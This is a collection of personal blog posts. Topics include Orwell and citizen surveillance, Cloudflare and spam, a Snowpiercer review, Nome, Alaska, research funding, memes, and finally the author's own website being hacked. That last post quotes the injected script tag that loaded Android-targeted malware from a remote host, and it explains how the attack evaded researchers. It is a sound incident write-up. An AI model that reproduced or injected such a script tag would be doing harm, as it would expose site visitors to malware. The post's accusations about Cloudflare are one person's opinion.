1984: How George Orwell Got it Wrong

When I was in high school, one of the many books on our required reading list in my AP English class was George Orwell’s 1984. As a naive, inexperienced teenager, I was deeply affected by it, in much the same way many other naive, inexperienced teens are deeply affected by Atlas Shrugged. I wrote a glowing book report, which, if memory serves, got me an A+.

1984 was a crude attempt at dystopian fiction, partly because it was more a hysterical anti-Communist screed than a serious effort at literature. Indeed, had it not been written at exactly the point in history it was written, near the dawn of the Cold War and just prior to the rise of McCarthyist anti-communist hysteria, it probably would not have become nearly the cultural touchstone it is now.

From the vantage point of 2014, parts of it seem prescient, particularly the overwhelming government surveillance of every aspect of the citizen’s lives. 1984 describes a society in which everyone is watched, all the time; there’s a minor plot hole (who’s watching all these video feeds?), but it escaped my notice back then.

But something happened on the way to dystopia–something Orwell didn’t predict. We tend to see surveillance as a tool of oppressive government; in a sense, we have all been trained to see it that way. But it is just as powerful a tool in the hands of the citizens, when they use it to watch the government.


As I write this, the town of Ferguson, Missouri has been wracked for over a week now because of the killing of an unarmed black teenager at the hands of an aggressive and overzealous police officer. When the people of Ferguson protested, the police escalated, and escalated, and escalated, responding with tear gas, arrests, and curfews.

Being a middle-aged white dude gives me certain advantages. I don’t smoke pot, but if I did and a police officer found me with a bag of weed in my pocket, the odds I’d ever go to prison are very, very small. Indeed, the odds I’d even be arrested are small. If I were to jaywalk in front of a police officer, or be seen by a police officer walking at night along a suburban sidewalk, the odds of a violent confrontation are vanishingly tiny. So it’s impossible for me, or real;y for most white dudes, to appreciate or even understand what it’s like to be black in the United States.

This is nothing new. The hand of government weighs most heavily on those who are least enfranchised, and it has always been so. All social structures, official and unofficial, slant toward the benefit of those on top, and in the United States, that means the male and pale.

And there’s long been a strong connection between casual, systemic racism and the kind of anti-Commie agitprop that made Orwell famous.

It is ironic, though not unexpected, that the Invisible Empire of the Knights of the Ku Klux Klan is raising a “reward” for the police officer who “did his job against the negro criminal”.

So far, so normal. This is as it has been since before the founding of this country. But now, something is different…and not in the way Orwell predicted. Surveillance changes things.


What Orwell didn’t see, and couldn’t have seen, is a time in which nearly every citizen carries a tiny movie camera everywhere. The rise of cell phones has made citizen surveillance nearly universal, with results that empower citizens against abuses of government, rather than the other way around.

Today, it’s becoming difficult for police to stop, question, arrest, beat, or shoot someone without cell phone footage ending up on YouTube within hours. And that is, I think, as it should be. Over and over again, police have attempted to prevent peopel from recording them in public places…and over and over again, the courts have ruled that citizens have the right to record the police.

It’s telling that in Ferguson, the protestors, who’ve been labeled “looters” and “thugs” by police, have been the ones who want video and journalism there…and it’s been the police who are trying to keep video recording away. That neatly sums up everything you need to know about the politics of Ferguson, seems to me.

Cell phone technology puts the shoe on the other foot. And, unsurprisingly, when the institutions of authority–the ones who say “if you have nothing to hide, you have nothing to fear from surveillance”–find themselves on the receiving end rather than the recording end of surveillance, they become very uncomfortable. In the past, abuses of power were almost impossible to prosecute; they happened in dark places, away from the disinfecting eye of public scrutiny. But now, that’s changing. Now, it’s harder and harder to find those dark places where abuse thrives.

In fact, the ACLU has released a smartphone app called Police Tape, which you can start running as soon as you find yourself confronted by police. It silently (and invisibly) records everything that happens, and uploads the file to a remote server.

If those in power truly had nothing to hide, they would welcome surveillance. New measures are being proposed in many jurisdictions that would require police officers to wear cameras wherever they go. The video from these cameras could corroborate officers’ accounts of their actions whenever misconduct was alleged, if–and this is the critical part–the officers tell the truth. When I hear people object to such cameras, then, the only conclusion I can draw is they don’t want a record of their activities, and I wonder why.

William Gibson, in the dystopian book Neuromancer (published, as fate would have it, in 1984) proposed that the greatest threats to personal liberty come, not from a government, but from corporations that assume de facto control over government. His vision seems more like 1984 than 1984. He was less jaundiced than Orwell, though. In the short story Burning Chrome, Gibson wrote, “The street finds its own uses for things.” The explosion of citizen surveillance proves how remarkably apt that sentiment is.

The famous first TV commercial for the Apple Macintosh includes the line “why 1984 won’t be like 1984.” The success of the iPhone and other camera-equipped smartphones, shows how technology can turn the tables on authority.

The police commissioners and state governors and others in the halls of political power haven’t quite figured out the implications yet. Technology moves fast, and the machinery of authority moves slowly. But the times, they are a-changin’. Orwell got it exactly wrong; it is the government, not the citizens, who have the most to fear from a surveillance society.

And that is a good thing.

Cloudflare: The New Face of Bulletproof Spam Hosting

…or, why do I get all this spam, and who’s serving it?

Spammers have long had to face a problem. Legitimate Web hosting companies don’t host spam sites. Almost all Web hosts have policies against spam, so spammers have to figure out how to get their sites hosted. After all, if you can’t go to the spammer’s website to buy something, the spammer can’t make money, right?

In the past, spammers have used overseas Web hosting companies, in countries like China or Romania, that are willing to turn a blind eye to spam in exchange for money. A lot of spammers still do this, but it’s becoming less common, as even these countries have become increasingly reluctant to host spam sites.

For a while, many spammers were turning to hacked websites. Someone would set up a WordPress blog or a Joomla site but wouldn’t keep on top of security patches. The spammers would use automated tools capable of scanning hundreds of thousands of sites looking for vulnerabilities and hacking them automatically, then they’d place the spam pages on the hacked site. And a lot of spammers still do this.

But increasingly, spammers are turning to the new big thing in bulletproof spam serving: content delivery networks like Cloudflare.


What is a content delivery network?

Basically, a content delivery network is a bunch of servers that sit between a traditional Web server and you, the Web user.

A ‘normal’ Web server arrangement looks something like this:

When you browse the Web, you connect directly to a Web server over the Internet. The Web server takes the information stored on it and sends it to your computer.

With a content delivery network, it looks more like this:

The CDN, like Cloudflare, has a large number of servers, often spread all over the country (or the globe). These servers make a copy of the information on the Web server. When you visit a website served by a CDN, you do not connect to the Web server. You connect to one of the content delivery network servers, which sends you the copy of the information it made from the Web server.

There are several advantages to doing this:

1. The Web server can handle more traffic. With a conventional Web server, if too many people visit the Web site at the same time, the Web server can’t handle the traffic, and it goes down.

2. The site is protected from hacking and denial-of-service attacks. If someone tries to hack the site or knock it offline, at most they can affect one of the CDN servers. The others keep going.

3. It’s faster. If you are in Los Angeles and the Web server is in New York, the information has to travel many “hops” through the Internet to reach you. If you’re in Los Angeles and the content delivery network has a server in Los Angeles, you’ll connect to it. There are fewer hops for the information to pass through, so it’s delivered more quickly.


Cloudflare and spam

Spammers love Cloudflare for two reasons. First, when a Web server is behind Cloudflare’s network, it is in many ways hidden from view. You can’t tell who’s hosting it just by looking at its IP address, the way you can with a conventional Web server, because the IP address you see is for Cloudflare, not the host.

Second, Cloudflare is fine with spam. They’re happy to provide content delivery services for spam, malware, “phish” sites like phony bank or PayPal sites–basically, whatever you want.

Cloudflare’s Web page says, a little defensively, “CloudFlare is a pass-through network provider that automatically caches content for a limited period in order to improve network performance. CloudFlare is not a hosting provider and does not provide hosting services for any website. We do not have the capability to remove content from the web.” And, technically speaking, that’s true.

Cloudflare doesn’t own the Web server. They don’t control what’s on it and they can’t take it offline. So, from a literal, technical perspective, they’re right when they say they can’t remove content from the web.

They can, however, refuse to provide services for spammers. They can do that, but they don’t.


History

CloudFlare was founded by Matthew Prince, Lee Holloway, and Michelle Zatlyn, three people who had previously worked on Project Honey Pot, which was–ironically–an anti-spam, anti-malware project.

Project Honey Pot allows website owners to track spam and hack attacks against their websites and block malicious traffic. In an interview with Forbes magazine, Michelle Zatlyn said:

“I didn’t know a lot about website security, but Matthew told me about Project Honey Pot and said that 80,000 websites had signed up around the world. And I thought ‘That’s a lot of people.’ They had no budget. You sign up and you get nothing. You just track the bad guys. You don’t get protection from them. And I just didn’t understand why so many people had signed up.”

It was then that Prince suggested creating a service to protect websites and stop spammers. “That’s something I could be proud of,’” Zatlyn says. “And so that’s how it started.”

So Cloudflare, which was founded with the goal of stopping spammers by three anti-spam activists, is now a one-stop, bulletproof supplier for spam and malware services.


The problem

Cloudflare, either intentionally or deliberately, has a broken internal process for dealing with spam and abuse complaints. Spamcop–a large anti-spam website that processes spam emails, tracks the responsible mail and Web hosts and notifies them of the spam–will no longer communicate with Cloudflare, because Cloudflare does not pay attention to email reports of abuse even though it has a dedicated abuse email address (that’s often unworkakble, as Cloudflare has in the past enabled spam filtering on that address, meaning spam complaints get deleted as spam).

Large numbers of organized spam gangs sign up for Cloudflare services. I track all the spam that comes into my mailbox, and I see so much spam that’s served by Cloudflare I keep a special mailbox for it.

Right now, about 15% of all the spam I receive is protected by Cloudflare. Repeated complaints to their abuse team, either to their abuse email addres or on their abuse Web form, generally have no effect. As I’ve documented here, Cloudflare will continue to provide services for spam, malware, and phish sites even long after the Web host that’s responsible for them has taken them down; they kept providing services for the malware domain rolledwil.biz, being used as part of a large-scale malware attack against Android devices, for months after being notified.

One of the spam emails in my Cloudflare inbox dates back to November of 2013. The Spamvertised domain, is.ss47.shsend.com, is still active, nearly a year after Cloudflare was notified of the spam. A PayPal phish I reported to CloudFlare in March of 2014 was finally removed from their content delivery network three months later…after some snarky Twitter messages from Cloudflare’s security team.

(They never did put up the interstitial warning, and continued to serve the PayPal phish page for another month or more.)

Cloudflare also continues to provide services for sites like masszip.com, the Web site that advertises pirated eBooks but actually serves up malware.

In fact, I’ve been corresponding with a US copyright attorney about the masszip.com piracy, and he tells me that Cloudflare claims immunity from US copyright law. They claim that people using the Cloudflare CDN aren’t really their concern; they’re not hosting the illegal content, they’re just making a copy of it and then distributing it, you see. Or, err, something.

I am not sure what happened within Cloudflare to make them so reluctant to terminate their users even in cases of egregious abuse, such as penis-pill spam, piracy, and malware distribution. From everything I can find, it was started by people genuinely dedicated to protecting the Internet from spam and malware, but somehow, somewhere along the way, they dropped the ball.

I wonder if Michelle Zatlyn is still proud.

Polyamory: How to handle a broken agreement without drama

Everyone’s favorite source of poly wisdom, BadAss McProblemsolver, is back to take on a complicated question: “How do I handle a broken relationship agreement without Drama?”

The answer, as it turns out, can be found in Star Wars. Don’t do what Luke Skywalker did in The Empire Strikes Back.

Movie Review: Snowpiercer

Last week, zaiah and I decided to spend an evening sitting in a dark room with a bunch of strangers staring passively at a flickering screen. We were in the mood for B science fiction, so we decided to go watch a low-budget sci-fi allegory about classism and economic repression whose characters are faced with losing body parts and whose plot heavily involves ice.

No, I don’t mean Ice Pirates. I mean the one that’s set on a train. I mean this one:

I must admit, it’s a worthy heir to the Ice Pirates crown. Without question, Snowpiercer is the best low-budget sci-fi allegory about classism and economic repression whose characters are faced with losing body parts and whose plot heavily involves ice that’s ever been set on a train.

The movie goes something like this:

Well-intentioned but incompetent scientists: Global warming is a thing. To fight global warming, we will spread a magic chemical in the air that will reduce global temperatures because magic, and also chemtrails. We will not model the results first, nor pay attention to the effects, because in this world modeling and verification are not things.

The WELL-INTENTIONED BUT INCOMPETENT SCIENTISTS spread MAGIC CHEMICALS in the AIR because MAGIC and also CHEMTRAILS. Global temperatures PLUMMET OVERNIGHT because THERMAL INERTIA ALSO ISN’T A THING.

Well-intentioned but incompetent scientists: Wow, we didn’t see that coming! The entire earth is now a frozen snowball and all life is extinct. Oops, our bad.

Jamie Bell: It sure does suck being one of the last human beings alive and being stuck in the back of this train. We should rebel and go to the front of the train. Chris Evans, you should lead us!
Chris Evans: Waitaminnit. If the world suddenly started freezing, why are the only survivors on a train? Why wouldn’t people make domed cities? Or dig shelters underground? For that matter, how come this train is even moving? Where does it get its fuel from?
Jamie Bell: It has a perpetual motion engine, of course! Duh.
Chris Evans: Oh, boy. It’s going to be one of those movies. And I thought my role in Captain America: The Winter Soldier was implausible. Man, I have got to talk to my agent about these winter-themed movies I keep getting cast in.

Click here for more (here be spoilers galore!):

Conversations with a kitty

This is our cat Beryl. He’s a blue solid Tonkinese, a cat breed that’s made of one part kitty, three parts fearlessness, and sixteen parts love. Tonks are absolutely amazing kitties, with all of the cute adorableness of your standard-issue cat without any of the surly sociopathy.

A couple days ago, I received a package in the mail. On the same day, I went out to buy new printer ink cartridges and came home with a new black and white laser printer, which was cheaper than a set of replacement ink cartridges because capitalism and market efficiencies and invisible guiding hand and Adam Smith LOL.

Anyway, Beryl and I had a conversation that went something like this:

Me: Hey, kitty! Look! I brought you a present! It’s an empty box!

Beryl: OMG you are the BEST. A box! This is amazing! Thank you! Thank you so much! From here I can hide and pounce on Liam all unawares and stuff.

Me: And check this out! I got a new printer, so here’s another empty box.

Beryl: TWO empty boxes? Truly, my cup runneth over. I don’t think I’ve been this happy since…since…since ever! Now I can hop from one box to another. The cunning box-ambush strategies I can devise with TWO boxes will make me the undisputed champion of my domain. You are the greatest. Truly, I mean that. And it’s not just the boxes, it’s also the food preparation. I will remember you in the long years of my reign.

Me: Okay, I need some more space to set up this printer. Here, let me just put this box inside the other box…

Beryl:

Beryl: The hell?

Beryl: You…you just…

Beryl: There is an empty box inside another empty box!

Beryl: You…I…it…

Beryl: How is this even possible? I can hop into a box, and when I get there, there is..another box! Another box, that I can ALSO hop into!

Beryl: I can be inside TWO BOXES AT THE SAME TIME.

Beryl: How did you make this happen?

Beryl: You are like a god. Like. A. God. A god of boxes. You…I never even…it’s just so beautiful!

Beryl: Never in all my life have I imagined such a thing. You have opened my eyes to the Possible, and truly is it more amazing than I had ever dared to hope.

Beryl: Two boxes. TWO boxes. One box inside…inside the other…I’m having a moment.

Me: I’m glad I could make you happy, little buddy.

Beryl: Happy? Happy? Happy is getting the squishy food. Happy is having ONE box to play with. Happy is sitting on your shoulder while you do that thing where you sit in front of that glowing thing and you pretend like you’re a mage and you press buttons and throw frostbolts around and you swear at the goddamn hunter who always pulls aggro and is never where he’s supposed to be and…

Me: You mean play World of Warcraft?

Beryl: Yes, that. Happy is sitting on your shoulder while you do that. But this…this is…

Beryl: If Voluptas, the goddess of bliss born of the union between Cupid and Psyche, had been capable of feeling what I’m feeling right now, the entire story of the world would be rewritten. Temples in her name would stand still as the greatest of all human accomplishments. If you could package what I’m feeling and distribute it, wars would end, ancient rivalries would be forgotten, petty jealousy would be as extinct as the Stegosaurus.

Me: I’m just glad you like your boxes.

Me: Wait, how the hell do you know about Roman mythology? You’re a cat!

Beryl: Can’t talk. Busy playing. In boxes.

Nome, Alaska: There’s gold on that ther beach!

Nome, Alaska was incorporated as a town in 1901, because of a gold rush. In the late 1800s, gold was discovered in the mountains around Nome; in the early 1900s, more gold was discovered in the sand on the edge of the Bering Sea.

There’s still lots of gold in Nome. While there’s no longer a full-on gold rush, there’s still considerable gold mining around Nome, and some of its beaches are designated for “recreational mining.”

For three months out of the year, Nome’s beaches are home to the strangest temporary communities you will find outside Burning Man. But these are not well-off techie hipsters who take drugs and dance around a giant fire. They’re folks from Canada and the United States who head up to Nome, where they set up tents and build makeshift houses from reclaimed materials (shipping pallets, old signs, and whatever else they can find) to spend the summer months sifting the beach sand for gold.

There are all kinds of rules on recreational gold mining. Each “claim” is at most 75 feet wide; claims are temporary and evaporate at the end of the season or when you move off the beach; there’s a limit of 40 ounces of gold per person or group per year, which is about $52,000 worth at current market prices. There are limits on the equipment that can be used.

The people who do this are a really interesting bunch. We talked to several folks on the beach, most of whom come up year after year to look for gold. The people we met were friendly and outgoing, willing to show us their equipment and talk about their favorite techniques. Most were cagey about the amount of gold they find every year, but my impression was they generally tend to get about the 40-ounce limit.

Or at least that’s what they declare at the end of the season.

There’s industrial-scale mining as well, but to me, the hobbyist mining is absolutely fascinating.

Summer in Nome is strange: the sun barely ever sets (it’s a little freaky to go outside at midnight and see the sun still high in the sky), so the beach miners tend to work whenever they are awake and sleep whenever they’re tired–there seems to be little in the way of set schedules. The temperature was pleasant while we were there, though apparently near-constant light rain and occasional storms are normal during parts of the summer. It is still Alaska, which means the environment is still hostile enough to produce the occasional odd survival event without warning; as a result, the community tends to be close-knit, with everyone watching out for everyone else…interesting to see in folks who are prone to say they enjoy doing this every year at least partly to get away from other people.

The sand on the beach looks like this. The red color apparently indicates rich gold-bearing sand.

I’m actually considering going up there next year and spending the summer living on the beach panning for gold. Not because I expect to find any or to strike it rich, mind, but simply for the experience of it. It would make one hell of a “how I spent my summer vacation” story! (There are rumors the state will not be permitting hobbyist mining on the beach next year, though these rumors seem to have been circulating for years–one person we talked to said he heard the same thing several years back when he did it for the first time.)

Back when the 1940s and 1950s, it was common to mine for gold using enormous dredging machines like this one, now in ruins and slowly crumbling into the tundra:

These gigantic hulks are dotted all over the landscape around Nome. They were expensive to build and ship, and woefully inefficient–at best, they might recover 40% of the gold from the sand. In fact, the tailings left behind by these old machines are being mined again with more efficient techniques, and the amount of gold left in them is quite high.

I’m not sure I want to be doing this, but I am very sure I want to have done it. The book that would come out of this experience would be amazing.

Some thoughts on government funding for research

Every time you buy a hard drive, some of your money goes to the German government.

That’s because in the late 1990s, a physicist named Peter Grünberg at the Forschungszentrum Jülich (Jülich Research Center) made a rather odd discovery.

The Jülich Research Center is a government-funded German research facility that explores nuclear physics, geoscience, and other fields. There’s a particle accelerator there, and a neutron scattering reactor, and not one or two or even three but a whole bunch of supercomputers, and a magnetic confinement fusion tokamak, and a whole bunch of other really neat and really expensive toys. All of the Center’s research money comes from the government–half from the German federal government and half from the Federal State of North Rhine-Westphalia.

Anyway, like I was saying, in the late 1990s, Peter Grünberg made a rather odd discovery. He was exploring quantum physics, and found that in a material made of several layers of magnetic and non-magnetic materials, if the layers are thin enough (and by “thin enough” I mean “only a few atoms thick”), the material’s resistance changes dramatically when it’s exposed to very, very weak magnetic fields.

There’s a lot of deep quantum voodoo about why this is. Wikipedia has this to say on the subject:

If scattering of charge carriers at the interface between the ferromagnetic and non-magnetic metal is small, and the direction of the electron spins persists long enough, it is convenient to consider a model in which the total resistance of the sample is a combination of the resistances of the magnetic and non-magnetic layers.

In this model, there are two conduction channels for electrons with various spin directions relative to the magnetization of the layers. Therefore, the equivalent circuit of the GMR structure consists of two parallel connections corresponding to each of the channels. In this case, the GMR can be expressed as

Here the subscript of R denote collinear and oppositely oriented magnetization in layers, χ = b/a is the thickness ratio of the magnetic and non-magnetic layers, and ρN is the resistivity of non-magnetic metal. This expression is applicable for both CIP and CPP structures.

Make of that what you will.


Conservatives and Libertarians have a lot of things in common. In fact, for all intents and purposes, libertarians in the United States are basically conservatives who are open about liking sex and drugs. (Conservatives and libertarians both like sex and drugs; conservatives just don’t cop to it.)

One of the many areas they agree on is that the governmet should not be funding science, particularly “pure” science with no obvious technological or commercial application.

Another thing they have in common is they don’t understand what science is. In the field of pure research, you can never tell what will have technological or commercial application.

Back to Peter Grünberg. He discovered that quantum mechanics makes magnets act really weird, and in 2007 he shared a Nobel Prize with French physicist Albert Fert, a researcher at the French Centre national de la recherche scientifique (French National Centre for Scientific Research), France’s largest government-funded research facility.

And it turns out this research had very important commercial applications:

You know how in the 80s and 90s, hard drives were these heavy, clunky things with storage capacities smaller than Rand Paul’s chances at ever winning the Presidency? And then all of a sudden they were terabyte this, two terabyte that?

Some clever folks figured out how to use this weird quantum mechanics voodoo to make hard drive heads that could respond to much smaller magnetic fields, meaning more of them could be stuffed on a magnetic hard drive platter. And boom! You could carry around more storage in your laptop than used to fit in a football stadium.

It should be emphasized that Peter Grünberg and Albert Fert were not trying to invent better hard drives. They were government physicists, not Western Digital employees. They were exploring a very arcane subject–what happens to magnetic fields at a quantum level–with no idea what they would find, or whether it would be applicable to anything.


So let’s talk about your money.

When it became obvious that this weird quantum voodoo did have commercial possibility, the Germans patented it. IBM was the first US company to license the patent; today, nearly all hard drives license giant magnetoresistance patents. Which means every time you buy a hard drive, or a computer with a hard drive in it, some of your money flows back to Germany.

Conservatives and libertarians oppose government funding for science because, to quote the Cato Institute,

[G]overnment funding of university science is largely unproductive. When Edwin Mansfield surveyed 76 major American technology firms, he found that only around 3 percent of sales could not have been achieved “without substantial delay, in the absence of recent academic research.” Thus some 97 percent of commercially useful industrial technological development is, in practice, generated by in-house R&D. Academic science is of relatively small economic importance, and by funding it in public universities, governments are largely subsidizing predatory foreign companies.

Make of that what you will. I’ve read it six times and I’m still not sure I understand the argument.

The Europeans are less myopic. They understand two things the Americans don’t: pure research is the necessary foundation for a nation’s continued economic growth, and private enterprise is terrible at funding pure research.

Oh, there are a handful of big companies that do fund pure research, to be sure–but most private investment in research comes after the pure, no-idea-if-this-will-be-commercially-useful, let’s-see-how-nature-works variety.

It takes a lot of research and development to get from the “Aha! Quantum mechanics does this strange thing when this happens!” to a gadget you have in your home. That also takes money and development, and it’s the sort of research private enterprise excels at. In fact, the Cato Institute cites many examples of biotechnology and semiconductor research that are privately funded, but these are types of research that generally already have a clear practical value, and they take place after the pure research upon which they rest.

So while the Libertarians unite with the Tea Party to call for the government to cut funding for research–which is working, as government research grants have fallen for the last several years in a row–the Europeans are ploughing money into their physics labs and research facilities and the Superconducting Supercollider, which I suspect will eventually produce a stream of practical, patentable ideas…and every time you buy a hard drive, some of your money goes to Germany.

Modern societies thrive on technological innovation. Technological innovation depends on understanding the physical world–even when it seems at first like there aren’t any obvious practical uses for what you learn. They know that, we don’t. I think that’s going to catch up with us.

Nome, Alaska: Ruins of the White Alice facility

There’s a mountain overlooking Nome. It’s called Anvil Mountain, and on that mountain is a kind of monument to the Cold War. You can see it from just about anywhere in town. These four enormous antennas squat over the landscape, a silent testament to the money and lives squandered on endless political bickering.

When I saw them, I had to check them out.

These four antennas are part of the old “White Alice” system, a communication system that was part of the old Distant Early Warning radar installation all along Alaska, constantly searching the sky for signs of Russian bombers sneaking over the Arctic and heading across Canada toward the United States.

The system was designed in the 1950s, when fear of the Commies was really starting to gain traction. The Distant Early Warning line was a set of remote high-powered radar facilities all along Alaska, but the designers had a problem. Alaska is huge. If you count the string of islands that extends from its western edge, many of which were home to DEW radar, Alaska is about the same distance stem to stern as the distance from California to New York.

And there are no roads, no telephone lines, and no power lines. Even today, there is no way to get to Nome by road; roads linking it to the rest of Alaska simply do not exist. You get in and out by air or barge, and that’s it.

The radar stations along the DEW line needed to be able to talk to command and control centers. Normal radio wouldn’t work; Alaska is so large that the curve of the earth renders line-of-sight radio unworkable.

So the Air Force came up with an idea: troposphere scattering. Basically, they decided to use enormous antennas pointed at the horizon to blast an immensely powerful radio signal, so strong it would bounce and scatter from the upper layers of the atmosphere, reaching stations beyond the curve of the earth.

The system was code-named “White Alice” and was built at enormous cost in the 1950s and operated through the 1970s, when satellite communication made it obsolete. By the time it was decommissioned, there were 71 of these stations, including the one on Anvil Mountain.

I borrowed a 4×4 and drove up the mountain. The facility is surrounded by a chain-link fence that has long since been pulled down and yanked apart in places. An ancient, battered sign warns trespassers that it’s a restricted area; the locals seem to use it for target practice.

The White Alice installations were powered by enormous diesel generators. Each of the four antennas at a facility consumed up to 10 KW of power; the generators provided power for the transmitters, the living quarters, and small line-of-site microwave dishes that provided short-range communication.

Most of the White Alice facilities have been completely dismantled. Several of them are toxic waste sites, as diesel fuel and other contaminants have been dumped all over the place.

When the Anvil Mountain White Alice facility was decommissioned, the residents of Nome asked the Corps of Engineers to leave the four big antennas. Everything else is gone.

These antennas are huge–about five stories tall.

Cost overruns, under-engineered specifications, and overly optimistic maintenance projections made the White Alice project run ten times over budget. Most of the materials to build the installations–hundreds of tons of equipment for each one–were shipped to remote mountain peaks by dogsled. Airbases were constructed at many of the sites to get fuel, people, and supplies in and out. Technicians worked at these sites year round, facing minus 30 degree weather or worse during the winter.

We went up twice, once during the afternoon and once at 1:30 in the morning to watch the simultaneous sunrise and sunset. I can only imagine how miserable it must have been to work here; in the middle of one of the warmest summers on record, when Nome was facing over-70-degree weather, it was cold and windy on top of the mountain. Winter, when the sun hardly comes up, must have been brutal.

I used my smartphone to take a panorama showing the whole installation from the very peak of Anvil Mountain. Click to embiggen!

Wrong in the age of Google: Memes as social identity

A short while ago, I published a tweet on my Twitter timeline that was occasioned by a pair of memes I saw posted on Facebook:

The memes in question have both been circulating for a while, which is terribly disappointing now that we live in the Golden Age of Google. They’re being distributed over an online network of billions of globally-connected devices…an online network of billions of globally-connected devices which lets people discover in just a few seconds that they aren’t actually true.

A quick Google search shows both of these memes, which have been spread across social media countless times, are absolute rubbish.

The quote attributed to Albert Einstein appears to have originated with a self-help writer named Matthew Kelly, who falsely attributed it to Einstein in what was probably an attempt to make it sound more legitimate. It doesn’t even sound like something he would have said.

The second is common on conservative blogs and decries the fact that Obamacare (or, sometimes, Medicaid) offer free health coverage to undocumented immigrants. In fact, Federal law bars undocumented immigrants from receiving Federal health care services or subsidies for health insurance, with just one exception: Medicaid will pay hospitals to deliver babies of undocumented mothers (children born in the United States are legal US citizens regardless of the status of their parents).

Total time to verify both of these memes on Google: less than thirty seconds.

So why, given how fast and easy it is to verify a meme before reposting it, does nobody ever do it? Why do memes that can be demonstrated to be true in less time than it takes to order a hamburger at McDonald’s still get so much currency?

The answer, I think, is that it doesn’t matter whether a meme is true. It doesn’t matter to the people who post memes and it doesn’t matter to the people who read them. Memes aren’t about communication, at least not communication of facts and ideas. They are about social identity.


Viewed through the lens of social identity, memes suddenly make sense. The folks who spread them aren’t trying to educate, inform, or communicate ideas. Memes are like sigils on a Medieval lord’s banner: they indicate identity and allegiance.

These are all memes I’ve seen online in the last six weeks. What inferences can we make about the people who posted them? These memes speak volumes about the political identities of the people who spread them; their truthfulness doesn’t matter. We can talk about the absurdity of Oprah Winfrey’s reluctance to pay taxes or the huge multinational banks that launder money for the drug cartels, and both of those are conversations worth having…but they aren’t what the memes are about.

It’s tempting to see memes as arguments,especially because they often repeat talking points of arguments. But I submit that’s the wrong way to view them. They may contain an argument, but their purpose is not to try to argue; they are not a collective debate on the merits of a position.

Instead, memes are about identifying the affiliations of the folks who post them. They’re a way of signaling in-group and out-group status. That makes them distinct from, say, the political commentary in Banksy’s graffiti, which I think is more a method of making an argument. Memes are a mechanism for validating social identity. Unlike graffiti, there’s no presupposition the memes will be seen by everyone; instead, they’re seen by the poster’s followers on social media–a self-selecting group likely to already identify with the poster.

Even when they’re ridiculously, hilariously wrong. Consider this meme, for example. It shows a photograph of President Barack Obama receiving a medal from the king of Saudi Arabia.

The image is accurate, thought the caption is not. The photo shows Barack Obama receiving the King Abdul Aziz Order of Merit from King Abdullah. It’s not unconstitutional for those in political office to receive gifts from foreign entities, provided those gifts are not kept personally, but are turned over to the General Services Administration or the National Archives.

But the nuances, like I said, don’t matter. It doesn’t even matter that President George W. Bush received the exact same award while he was in office:

If we interpret memes as a way to distribute facts, the anti-Obama meme is deeply hypocritical, since the political conservatives who spread it aren’t bothered that a President on “their” side received the same award. If we see memes as a way to flag political affiliation, like the handkerchiefs some folks in the BDSM community wear in their pockets to signal their interests, it’s not. By posting it, people are signaling their political in-group.

Memes don’t have to be self-consistent. The same groups that post this meme:

also tend by and large to support employment-at-will policies giving employers the right to fire employees for any reason, including reasons that have nothing to do with on-the-job performance…like, for instance, being gay, or posting things on Facebook the employer doesn’t like.

Memes do more than advertise religious affiliation; they signal social affiliation as well.

Any axis along which a sharp social division exists will, I suspect, generate memes. I also suspect, though I think the phenomenon is probably too new to be sure, that times of greater social partisanship will be marked by wider and more frequent distribution of memes, and issues that create sharper divides will likewise lead to more memes.

There are many ideas that are “identity politics”–ideas that are held not because they’re supported by evidence, but simply because they are a cost of entry to certain groups. These ideas form part of the backbone of a group; they serve as a quick litmus test of whether a person is part of the out-group or the in-group.

For example, many religious conservatives reflexively oppose birth control for women, even if the majority of its members, like the majority of women in the US at large, use it. Liberals reflexively oppose nuclear power, even though it is by far the safest source of power on the basis of lives lost per terawatt hour of electricity produced. The arguments used to support these ideas (“birth control pills cause abortions,” “nuclear waste is too dangerous to deal with”) are almost always empirically, demonstrably false, but that’s irrelevant. These ideas are part of a core set of values that define the group; holding them is about communicating shared values, not about true and false.

Unfortunately, these core identity ideas often lead directly not only to misinformation and a distorted worldview, but to actual human suffering. Opposition to vaccination and genetically modified foods are identity ideas among many liberals; conservatives oppose environmental regulation and deny human involvement in climate change as part of their identity ideas. These ideas have already led to human suffering and death, and are likely to lead to more.

Human beings are social animals capable of abstract reasoning, which perhaps makes it inevitable that abstract ideas are so firmly entrenched in our social structures. Ideas help define our social structures, identify in-group and out-group members, and signal social allegiances. The ideas we present, even when they take the form of arguments, are often not attempts at dialog so much as flags that let others know which lord we march for. Social media memes are, in that way, more accurately seen as house sigils than social discourse.

More Than Two hack

As most of you know, I do computer security as a hobby. (Browse the Computer Security and Computer Viruses tags on this blog to see what I mean.) So it was with a measure of embarrassment I discovered, while at Atlanta Poly Weekend in June, the More Than Two Web site had been hacked.

I first became aware there was a problem when visiting the site on a phone shows this:

I investigated and discovered that malicious code had been added to the bottom of each page, just below the closing body tag. The following code had been injected:

<noindex>
<script src=”http://stat.rolledwil.biz/stat.php?1921853954″>
</script>
</noindex>

I spent the next few hours not going to panels or workshops, but instead looking at logs, talking to my hosting provider, and investigating the source of the attack. Fortunately, an old friend of mine from Atlanta who does computer security professionally happened to be at the convention, and I spent some time talking to him, too.

A malicious file that offered people a back door into the site had been added, and files had been tampered with to inject the hostile code into HTML pages.

I quickly discovered the attack was targeted only at Android browsers, and only certain versions of Android (as near as I can tell, versions equal to or less than 4.0).

The site at stat.rolledwil.biz returned a 404 Not Found whenever I tried to visit it directly. In addition, non-Android mobile browsers and desktop browsers didn’t return the error.

I remove dthe malicious files and the hack, and then set about figuring out what had happened and what its purpose was. What I found was interesting.


The malicious site at stat.rolledwil.biz was served by Cloudflare, the spam and malware sewer that figures prominently in problems I’ve written about here and here. I emailed Cloudflare, and received a terse reply that the actual host was an outfit called Digital Ocean. I emailed them, and they quickly shut down the malware server.

The number that appears after the question mark in the line

<script src=”http://stat.rolledwil.biz/stat.php?1921853954″>

is an encoded version of the IP address of the More Than Two server. Te first thing this script does is check the browser referrer against this encoded IP address. If they aren’t the same, it returns a 404. Basically, it looks to see if the script is being called from a hacked Web site. If it isn’t, then it’s probably a security researcher trying to figure out what the script does, so it sends back a 404.

The next thing it does is look at the browser’s user agent–the thing that tells a Web site what kind of browser you’re using. If it isn’t Android, it also redirects to a 404. The flow looks like this:

So only if the call appears to be coming from an Android browser visiting a hacked Web site does the malicious script get served up. The script produces the alert dialog shown above, and tries to redirect to a URL in Eastern Europe (not functioning at the time I observed this).

